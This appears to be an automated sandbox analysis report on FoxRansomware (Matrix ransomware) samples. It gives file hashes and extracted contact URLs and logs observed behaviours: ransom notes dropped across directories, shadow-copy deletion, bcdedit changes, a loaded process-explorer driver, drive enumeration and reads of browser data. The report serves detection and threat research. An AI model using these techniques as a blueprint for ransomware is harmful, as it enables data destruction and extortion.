Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Analysis
-
max time kernel
149s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
13-02-2024 05:15
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20231215-en
General
-
Target
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
-
Size
1.2MB
-
MD5
1fa1b6d4b3ed867c1d4baffc77417611
-
SHA1
afb5e385f9cc8910d7a970b6c32b8d79295579da
-
SHA256
91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53
-
SHA512
0600b92914a7489a6428b8e4217e5f24e1d149fc5807d86cc4de91b43be2470a1ddf77093c8732d4371a87fd163cc556e09d11a2c6655382a35a5f5741ae05a5
-
SSDEEP
24576:K/SA+2lraRrjSJR5ezmT1dM9bBkNIDreFqO:2Xl9Ife
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\1033\14\#FOX_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jre7\lib\cmm\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Microsoft Office\Office14\PROOF\1036\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\1033\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\V17S5RKJ\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Microsoft Games\Chess\de-DE\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\Public\Libraries\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-452311807-3713411997-1028535425-1000\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Microsoft Games\Multiplayer\Checkers\fr-FR\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Microsoft Office\Office14\PROOF\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00007C7F\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_extractor\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Search Logos\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Microsoft Games\Multiplayer\Backgammon\it-IT\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Microsoft Games\SpiderSolitaire\de-DE\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\All Users\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\plugins\visualization\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Microsoft Office\Office14\OneNote\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created F:\$RECYCLE.BIN\S-1-5-21-452311807-3713411997-1028535425-1000\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jre7\lib\security\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Microsoft Games\Multiplayer\Spades\es-ES\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z2ud2i1e.default-release\storage\permanent\chrome\idb\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3292 bcdedit.exe 3468 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 9 3024 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS gbw8Tp4V64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" gbw8Tp4V64.exe -
Executes dropped EXE 3 IoCs
pid Process 2700 NWKkLa9n.exe 1192 gbw8Tp4V.exe 1636 gbw8Tp4V64.exe -
Loads dropped DLL 11 IoCs
pid Process 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 1020 cmd.exe 1192 gbw8Tp4V.exe 2876 WerFault.exe 2876 WerFault.exe 2876 WerFault.exe 2876 WerFault.exe 2876 WerFault.exe 2876 WerFault.exe 2876 WerFault.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 2552 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral9/files/0x0006000000016d63-430.dat upx behavioral9/memory/1192-443-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral9/memory/1192-1143-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Drops desktop.ini file(s) 43 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\V17S5RKJ\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\EW3J74TG\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Music\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Documents\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Links\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\TNEMG9GL\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-452311807-3713411997-1028535425-1000\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Videos\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-452311807-3713411997-1028535425-1000\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Music\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\VFIJ47B3\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\Q: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\H: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\I: gbw8Tp4V64.exe File opened (read-only) \??\N: gbw8Tp4V64.exe File opened (read-only) \??\E: gbw8Tp4V64.exe File opened (read-only) \??\G: gbw8Tp4V64.exe File opened (read-only) \??\M: gbw8Tp4V64.exe File opened (read-only) \??\T: gbw8Tp4V64.exe File opened (read-only) \??\W: gbw8Tp4V64.exe File opened (read-only) \??\V: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\P: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\J: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\J: gbw8Tp4V64.exe File opened (read-only) \??\Q: gbw8Tp4V64.exe File opened (read-only) \??\R: gbw8Tp4V64.exe File opened (read-only) \??\X: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\T: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\E: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\B: gbw8Tp4V64.exe File opened (read-only) \??\L: gbw8Tp4V64.exe File opened (read-only) \??\V: gbw8Tp4V64.exe File opened (read-only) \??\X: gbw8Tp4V64.exe File opened (read-only) \??\W: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\R: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\O: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\M: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\H: gbw8Tp4V64.exe File opened (read-only) \??\O: gbw8Tp4V64.exe File opened (read-only) \??\P: gbw8Tp4V64.exe File opened (read-only) \??\Y: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\K: gbw8Tp4V64.exe File opened (read-only) \??\Y: gbw8Tp4V64.exe File opened (read-only) \??\S: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\N: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\K: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\A: gbw8Tp4V64.exe File opened (read-only) \??\U: gbw8Tp4V64.exe File opened (read-only) \??\Z: gbw8Tp4V64.exe File opened (read-only) \??\U: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\L: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\I: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\G: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\S: gbw8Tp4V64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\OsRNBNcX.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
